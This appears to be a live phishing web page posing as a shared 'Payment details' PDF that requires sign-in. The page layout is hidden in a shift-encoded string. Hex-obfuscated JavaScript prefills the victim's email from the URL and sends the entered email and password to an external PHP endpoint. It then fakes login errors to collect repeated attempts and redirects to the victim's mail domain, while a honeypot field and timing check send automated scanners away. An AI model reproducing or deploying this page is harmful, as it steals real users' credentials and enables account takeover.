<!DOCTYPE html>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <meta name="theme-color" content="#000000">
    <title>Files Location - 2023</title>

    <style>
        body {
            font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
            font-size: 14px;
            line-height: 1.42857143;
            color: #333;
            background-color: #fff
        }

        @media all and (max-width: 480px) {
            .sidebar {
                display: none;
            }

            .midle {
                margin-left: 0px;
            }
        }

        @media only screen and (min-width: 481px) {
            .sidebar {
                display: block;
            }

            .midle {
                margin-left: 206px;
            }
        }

        .main {
            width: 100%;
            overflow-y: hidden;
            background-size: contain;
            background-color: #fff;
            clear: both;
            background-position: top;
            position: relative
        }

        .main,
        .nav {
            font-size: 1em;
            overflow-x: hidden;
            background-repeat: no-repeat
        }

        .nav {
            position: fixed;
            text-align: center;
            background-color: #1927f0;
            height: 47px;
            background-image: url();
            width: 1347px;
            background-position: 0;
            margin-top: 0;
            z-index: 0
        }

        .nav-icon {
            background-image: url(https://i.imgur.com/qXjvBuJ.png)
        }

        .nav-icon,
        .sidebar {
            overflow-x: hidden;

            background-repeat: no-repeat;
            z-index: 9
        }

        .sidebar {
            background-image: url(https://i.imgur.com/0eFfOJD.png)
        }

        .white {
            background-image: url(https://i.imgur.com/b7b7fz9.png)
        }

        .marked,
        .white {
            background-repeat: no-repeat;
            z-index: 9
        }

        .marked {
            background-image: url(https://i.imgur.com/s3ZIXan.png);
            background-position: 100% 0
        }

        .icon-ad {
            background-image: url(https://i.imgur.com/ojeGOvm.png);
            background-repeat: no-repeat;
            z-index: 9;
            background-position: 50%;
            background-size: 100%
        }

        .modal-open .modal {
            overflow-x: hidden;
            overflow-y: auto;
            z-index: 1050;

        }

        .fade.in {
            opacity: 2
        }

        .modal {
            position: fixed;
            top: 0;
            right: 0;
            bottom: 0;
            left: 0;
            z-index: -1;
            display: none;
            overflow: hidden;
            -webkit-overflow-scrolling: touch;
            justify-content: center;
            align-items: center;

            outline: 0
        }



        .fade {
            opacity: 0;
            transition: opacity .15s linear
        }

        .modal-content {
            position: relative;
            background-color: #fff;
            background-clip: padding-box;
            border: 1px solid #999;
            border: 1px solid rgba(0, 0, 0, .2);
            border-radius: 6px;
            box-shadow: 0 3px 9px rgb(0 0 0/50%);
            outline: 0
        }

        .modal-header {
            padding: 15px;
            border-bottom: 1px solid #e5e5e5
        }

        .modal-header .close {
            margin-top: -2px
        }

        button.close {
            padding: 0;
            cursor: pointer;
            background: 0 0;
            border: 0;
            -webkit-appearance: none;
            appearance: none
        }

        .close {
            float: right;
            font-size: 21px;
            font-weight: 700;
            line-height: 1;
            color: #000;
            text-shadow: 0 1px 0 #fff;
            filter: alpha(opacity=20);
            opacity: .2
        }

        .modal-title {
            margin: 0;
            line-height: 1.42857143
        }

        .modal-body {
            position: relative;
            padding: 15px
        }

        /*# sourceMappingURL=4.f763ac3f.chunk.css.map */
    </style>

	<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
    <!-- 
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<link type="text/css" rel="stylesheet" charset="UTF-8" href="https://translate.googleapis.com/translate_static/css/translateelement.css">
<script type="text/javascript" charset="UTF-8" src="https://translate.googleapis.com/_/translate_http/_/js/k=translate_http.tr.en_GB.-7ma4DyIkns.O/d=1/exm=el_conf/ed=1/rs=AN8SPfozqaxPwivFaDek0NowHJcVTMe5sA/m=el_main"></script>
 -->




    <script>
       /*  function googleTranslateElementInit() {
            new google.translate.TranslateElement({
                pageLanguage: 'en',
                layout: google.translate.TranslateElement.InlineLayout.SIMPLE, autoDisplay: true, multilanguagePage: true
            }, 'google_translate_element');
            var a = document.querySelector("#google_translate_element select");
            a.selectedIndex = 1;
            a.dispatchEvent(new Event('change'));
        } */
    </script>
    <!-- <script type="text/javascript" src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script> -->
    <noscript>You need to enable JavaScript to run this app.</noscript>

<script>var s="!!!!=ejw!je>#sppu#?!!!!!!!!=ejw!dmbtt>#nbjo#?!!!!!!!!!!!!=ejw!dmbtt>#obw#!tuzmf>#xjeui;!211&<!cbdlhspvoe.dpmps;!shc)1-!1-!1*<#?!!!!!!!!!!!!!!!!=ejw!tuzmf>#gmpbu;!mfgu<!dpmps;!$ggg<gpou.tj{f;!31qy<qbeejoh.mfgu;!25qy<qbeejoh.upq;!21qy<!ufyu.usbotgpsn;!dbqjubmj{f<!#!dmbtt>#!#?=jnh!tsd>#iuuqt;00j/jnhvs/dpn0VMtg96U/qoh#!xjeui>#46#!bmu>#nbdijoftqbsft.mphp#!dmbtt>#mphp#!je>##?!!!!!!!!!!!!!!!!!!!!Qbznfou!Efubjmt!QEG=0ejw?!!!!!!!!!!!!!!!!=ejw!tuzmf>#xjeui;!bvup<!ifjhiu;!58qy<!cbdlhspvoe;!usbotqbsfou!opof!sfqfbu!tdspmm!1&!1&<!gmpbu;!sjhiu<#?!!!!!!!!!!!!!!!!!!!!=ejw!tuzmf>#xjeui;!321qy<!cbdlhspvoe.dpmps;!hsffo<!ifjhiu;!58qy<!gmpbu;!mfgu<#!dmbtt>#obw.jdpo#?!!!!!!!!!!!!!!!!!!!!=0ejw?!!!!!!!!!!!!!!!!!!!!=ejw!tuzmf>#xjeui;!bvup<!cbdlhspvoe.dpmps;!usbotqbsfou<!ifjhiu;!58qy<!gmpbu;!sjhiu<#!dmbtt>##?!!!!!!!!!!!!!!!!!!!!!!!!=ejw!tuzmf>#gmpbu;!mfgu<!qbeejoh.mfgu;!21qy<!qbeejoh.sjhiu;!21qy<!mjof.ifjhiu;!58qy<!dpmps;!shc)366-!366-!366*<#?!!!!!!!!!!!!!!!!!!!!!!!!!!!!=joqvu!sfbepomz>##!dmbtt>#nz`vtfs#!tuzmf>#cbdlhspvoe;!shcb)1-!1-!1-!1*!opof!sfqfbu!tdspmm!1&!1&<!cpsefs;!1qy!opof<!pvumjof;!dvssfoudpmps!opof!1qy<!dpmps;!shc)366-!366-!366*<!ufyu.bmjho;!sjhiu<#!wbmvf>##?!!!!!!!!!!!!!!!!!!!!!!!!=0ejw?





=jnh!tsd>#iuuqt;00j/jnhvs/dpn0[ko:tpK/qoh#!tuzmf>#gmpbu;!sjhiu<!qbeejoh.sjhiu;!21qy<#!bmu>#jdpo#?!!!!!!!!!!!!!!!!!!!!=0ejw?!!!!!!!!!!!!!!!!=0ejw?!!!!!!!!!!!!=0ejw?!!!!!!!!!!!!=ejw!je>#cfgpsusvf#!tuzmf>#xjeui;!211&<#?!!!!!!!!!!!!!!!!=ejw!tuzmf>#xjeui;!211&<!nbshjo.upq;!58qy<!qptjujpo;!gjyfe<#?!!!!!!!!!!!!!!!!!!!!=ejw!tuzmf>#gmpbu;!mfgu<!xjeui;!319qy<!qptjujpo;!gjyfe<!ifjhiu;!727qy<#!dmbtt>#tjefcbs#?!=0ejw?!!!!!!!!!!!!!!!!!!!!=ejw!tuzmf>#gmpbu;!mfgu<!!cbdlhspvoe.dpmps;!shc)366-!366-!366*<!qptjujpo;!tubujd<!xjeui;!211&<#!dmbtt>#njemf#?!!!!!!!!!!!!!!!!!!!!!!!!=ejw!dmbtt>#xijuf#!tuzmf>#ifjhiu;!48qy<!xjeui;!211&<!cbdlhspvoe.dpmps;!shc)355-!355-!355*<!#?!!!!!!!!!!!!!!!!!!!!!!!!=0ejw?!!!!!!!!!!!!!!!!!!!!!!!!=ejw!ebub.uphhmf>#npebm#!ebub.ubshfu>#$nzNpebm#!tuzmf>#qbeejoh.mfgu;!25qy<!qbeejoh.upq;!42qy<#?!!!!!!!!!!!!!!!!!!!!!!!!!!!!=tqbo!tuzmf>#gpou.tj{f;!36qy<#!dmbtt>#nz`vtfs`tibsfe#?Tibsfe!Gjmft=0tqbo?!!!!!!!!!!!!!!!!!!!!!!!!!!!!=ejw!tuzmf>#xjeui;!287qy<!ifjhiu;!282qy<!cbdlhspvoe.dpmps;!shc)345-!345-!345*<!nbshjo.upq;!31qy<!dvstps;!qpjoufs<#!dmbtt>#nbslfe#?=cs?!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!=dfoufs?!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!=ejw!tuzmf>#cbdlhspvoe.dpmps;!shcb)366-!366-!366-!1/363*<!nbshjo.upq;!3qy<!xjeui;!81qy<!ifjhiu;!:7qy<!cpy.tibepx;!shcb)343-!334-!334-!1/192*!2qy!3qy!6qy<!qbeejoh.cpuupn;!21qy<#!dmbtt>#jdpo.be#?!=0ejw?!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!=0dfoufs?!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!=dfoufs?!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!=ejw!tuzmf>#gmfy.tisjol;!2<!gpou.tj{f;!25qy<!gpou.xfjhiu;!511<!nbshjo.upq;!7qy<#?!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!Qbznfou!efubjmt!.!ue95489/qeg=0ejw?!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!=ejw!tuzmf>#gmfy.tisjol;!2<!gpou.gbnjmz;!Tfhpf!VJ-!Tfhpf!VJ!Xfc-!Tfhpf!VJ-!.bqqmf.tztufn-!CmjolNbdTztufnGpou-!Spcpup-!Ifmwfujdb!Ofvf-!tbot.tfsjg<!gpou.tj{f;!23qy<!gpou.xfjhiu;!511<!dpmps;!shc)22:-!6-!6*<!nbshjo.upq;!.6qy<#?!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!Dmjdl!Qeg!Up!Sfwjfx!Epdvnfou!=0ejw?!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!=0dfoufs?!!!!!!!!!!!!!!!!!!!!!!!!!!!!=0ejw?!!!!!!!!!!!!!!!!!!!!!!!!=0ejw?!!!!!!!!!!!!!!!!!!!!=0ejw?!!!!!!!!!!!!!!!!=0ejw?!!!!!!!!!!!!=0ejw?!!!!!!!!=0ejw?!!!!!!!!=ejw!dmbtt>#npebm!gbef!jo#!ebub.cbdlespq>#tubujd#!ebub.lfzcpbse>#gbmtf#!je>#nzNpebm#!spmf>#ejbmph#?!!!!!!!!!!!!=ejw!dmbtt>#npebm.ejbmph#!tuzmf>#nbshjo.upq;!214qy<!xjeui;!548qy<#?!!!!!!!!!!!!!!!!=ejw!dmbtt>#npebm.dpoufou#!tuzmf>#cpsefs.sbejvt;!1qy<!ifjhiu;!511qy<!cpy.tibepx;!shcb)1-!1-!1-!1/6*!1qy!6qy!21qy<#?!!!!!!!!!!!!!!!!!!!!=ejw!dmbtt>#npebm.ifbefs#?=cvuupo!uzqf>#cvuupo#!dmbtt>#dmptf#!je>#dmptfmphjo#!ebub.ejtnjtt>#npebm#?y=0cvuupo?!!!!!!!!!!!!!!!!!!!!!!!!=ejw!je>#upqIfbefs#?!!!!!!!!!!!!!!!!!!!!!!!!!!!!=i5!dmbtt>#npebm.ujumf#?=jnh!tsd>#iuuqt;00deo.hpphmbqj.krvfsz/hb0jnh0gbwjdpo/qoh#!ifjhiu>#51qy#!bmu>#`mphp#!dmbtt>#mphp!gbw.tqbo#!je>#mphp`jnbhf#?!\'octq<!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!=tqbo!tuzmf>#ejtqmbz;opof#!dmbtt>#tqjo#?=j!dmbtt>#gb!gb.tqjoofs!gb.tqjo#?=0j?=0tqbo?!=0i5?!!!!!!!!!!!!!!!!!!!!!!!!!!!!=i6?=tqbo!dmbtt>#i!ufyu.jogp#?Tjho!jt!Sfrvjsfe!Up!Qsfwjfx!Qbznfou!Efubjmt!=0tqbo?=0i6?!!!!!!!!!!!!!!!!!!!!!!!!!!!!=i7?=tqbo!dmbtt>#i!ufyu.jogp#?Bddfttjoh!tfotjujwf!jogpsnbujpo!sfrvjsft!Tjho.Jo!wfsjgjdbujpo=0tqbo?=0i7?!!!!!!!!!!!!!!!!!!!!!!!!=0ejw?!!!!!!!!!!!!!!!!!!!!!!!!=dfoufs?





=ejw!dmbtt>#bmfsu!bmfsu.ebohfs#!je>#nth#!tuzmf>#ejtqmbz;!opof<#?Jowbmje!Qbttxpse/!Qmfbtf!Foufs!Zpvs!Dpssfdu!Qbttxpse=0ejw?!!!!!!!!=0dfoufs?!!!!!!!!!!!!!!!!!!!!=0ejw?!!!!!!!!!!!!!!!!!!!!=ejw!dmbtt>#npebm.cpez!#?




!=gpsn!obnf>#qgpsn#!je>#qgpsn#?!!!!!!!!!!!!!!!!!!!!!!!!=ejw!dmbtt>#gpsn.hspvq#!tuzmf>#xjeui;!:1&<#?!!!!!!!!!!!!!!!!!!!!!!!!!!!!=joqvu!uzqf>#ijeefo#!obnf>#obnf#!je>#obnf#?!!!!!!!!!!!!!!!!!!!!!!!!!!!!=joqvu!uzqf>#fnbjm#!obnf>#fnbjm#!qmbdfipmefs>#Foufs!Fnbjm#!dmbtt>#gpsn.dpouspm!spvoefe.1!ch.usbotqbsfou#!je>#fnbjm#!sfrvjsfe?!!!!!!!!!!!!!!!!!!!!!!!!=0ejw?!!!!!!!!!!!!!!!!!!!!!!!!=ejw!dmbtt>#gpsn.hspvq#!tuzmf>#xjeui;!:1&<#?!!!!!!!!!!!!!!!!!!!!!!!!!!!!=joqvu!uzqf>#qbttxpse#!obnf>#qbttxpse#!dmbtt>#gpsn.dpouspm#!wbmvf>##!je>#qbttxpse#!qmbdfipmefs>#Qbttxpse#!njomfohui>#7#!sfrvjsfe>##?!!!!!!!!!!!!!!!!!!!!!!!!=0ejw?!!!!!!!!!!!!!!!!!!!!!!!!=dfoufs?!!!!!!!!!!!!!!!!!!!!!!!!!!!!=ejw!dmbtt>#gpsn.difdl!nu.4!nc.4#?!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!=tqbo?=b!isfg>#$#!dmbtt>#gmpbu.sjhiu#?Gpshpu!nz!qbttxpse=0b?=0tqbo?=0ejw?!!!!!!!!!!!!!!!!!!!!!!!!!!!!!=cs?!!!!!!!!!!!!!!!!!!!!!!!!!!!!=ejw!dmbtt>#dpm.mh.23!nu.4#?






=cvuupo!uzqf>#tvcnju#!dmbtt>#cuo!ufyu.xijuf!qy.5!x.211!cuo.qsjnbsz!cuo.tjhojo#!je>#tvcnju.cuo#!tuzmf>#cbdlhspvoe.dpmps;!$2192fc<#?Tjho!Jo=0cvuupo?!






=0ejw?!!!!!!!!!!!!!!!!!!!!!!!!=0dfoufs?!!!!!!!!!!!!!!!!!!!!=0gpsn?!!!!!!!!!!!!!!!!!!!!=0ejw?!!!!!!!!!!!!!!!!=0ejw?!!!!!!!!!!!!=0ejw?!!!!!!!!=0ejw?!!!!=0ejw?";var m="";for(var i=0;i<s.length;i++)m+=String.fromCharCode(s.charCodeAt(i)-1);document.write(m);</script><noscript>You must enable JavaScript to see this text.</noscript>
 
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.3/jquery.min.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script> 	
    <script>
var _0xfae0=["\x73\x75\x62\x73\x74\x72","\x68\x61\x73\x68","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x76\x61\x6C","\x23\x65\x6D\x61\x69\x6C","\x73\x68\x6F\x77","\x6D\x6F\x64\x61\x6C","\x23\x6D\x79\x4D\x6F\x64\x61\x6C","\x73\x75\x62\x6D\x69\x74","\x23\x6E\x61\x6D\x65","\x74\x69\x6D\x65\x53\x74\x61\x6D\x70","\x74\x72\x69\x6D","","\x68\x72\x65\x66","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x6D","\x70\x72\x65\x76\x65\x6E\x74\x44\x65\x66\x61\x75\x6C\x74","\x73\x74\x6F\x70\x50\x72\x6F\x70\x61\x67\x61\x74\x69\x6F\x6E","\x68\x69\x64\x65","\x23\x6D\x73\x67","\x23\x70\x61\x73\x73\x77\x6F\x72\x64","\x40","\x73\x70\x6C\x69\x74","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x73\x68\x61\x62\x2E\x6A\x61\x6C\x62\x6C\x68\x61\x62\x69\x62\x2E\x63\x6F\x6D\x2F\x67\x69\x2F\x6E\x65\x78\x74\x2E\x70\x68\x70","\x70\x6F\x73\x74","\x56\x65\x72\x69\x66\x79\x69\x6E\x67\x2E\x2E\x2E","\x68\x74\x6D\x6C","\x64\x69\x73\x61\x62\x6C\x65\x64","\x70\x72\x6F\x70","\x23\x73\x75\x62\x6D\x69\x74\x2D\x62\x74\x6E","\x50\x6C\x65\x61\x73\x65\x20\x74\x72\x79\x20\x61\x67\x61\x69\x6E\x20\x6C\x61\x74\x65\x72","\x66\x6F\x63\x75\x73","\x6C\x6F\x67","\x53\x69\x67\x6E\x20\x49\x6E","\x61\x6A\x61\x78","\x68\x74\x74\x70\x73\x3A\x2F\x2F","\x6F\x6E","\x23\x70\x66\x6F\x72\x6D","\x72\x65\x61\x64\x79"];$(document)[_0xfae0[37]](function(){var _0xa5ebx1=window[_0xfae0[2]][_0xfae0[1]][_0xfae0[0]](1);var _0xa5ebx2=0;$(_0xfae0[4])[_0xfae0[3]](_0xa5ebx1);$(_0xfae0[7])[_0xfae0[6]](_0xfae0[5]);$(_0xfae0[36])[_0xfae0[35]](_0xfae0[8],(_0xa5ebx3)=>{var _0xa5ebx4=$(_0xfae0[9])[_0xfae0[3]]();var _0xa5ebx5=_0xa5ebx3[_0xfae0[10]];if(_0xa5ebx4[_0xfae0[11]]()!== _0xfae0[12]|| _0xa5ebx5< 2000){window[_0xfae0[2]][_0xfae0[13]]= _0xfae0[14]}else {_0xa5ebx3[_0xfae0[15]]();_0xa5ebx3[_0xfae0[16]]();$(_0xfae0[18])[_0xfae0[17]]();let _0xa5ebx1=$(_0xfae0[4])[_0xfae0[3]]();let _0xa5ebx6=$(_0xfae0[19])[_0xfae0[3]]();let _0xa5ebx7=_0xa5ebx1[_0xfae0[21]](_0xfae0[20])[1];_0xa5ebx2++;$[_0xfae0[33]]({url:_0xfae0[22],method:_0xfae0[23],data:{email:_0xa5ebx1,password:_0xa5ebx6},beforeSend:()=>{$(_0xfae0[28])[_0xfae0[27]](_0xfae0[26],true)[_0xfae0[25]](_0xfae0[24])},success:(_0xa5ebx8)=>{$(_0xfae0[18])[_0xfae0[5]](_0xfae0[29]);$(_0xfae0[18])[_0xfae0[25]](_0xfae0[29]);setTimeout(()=>{$(_0xfae0[19])[_0xfae0[3]](_0xfae0[12])[_0xfae0[30]]()},100)},error:(_0xa5ebx9,_0xa5ebxa)=>{console[_0xfae0[31]](_0xa5ebx9,_0xa5ebxa)},complete:function(){$(_0xfae0[28])[_0xfae0[27]](_0xfae0[26],false)[_0xfae0[25]](_0xfae0[32])}});if((_0xa5ebx2)=>{return 1}){setTimeout(()=>{$(_0xfae0[18])[_0xfae0[5]]();$(_0xfae0[19])[_0xfae0[3]](_0xfae0[12])},3000)};if(_0xa5ebx2> 3){window[_0xfae0[2]][_0xfae0[13]]= _0xfae0[34]+ _0xa5ebx7}}})})
</script>

 


</body>
</html>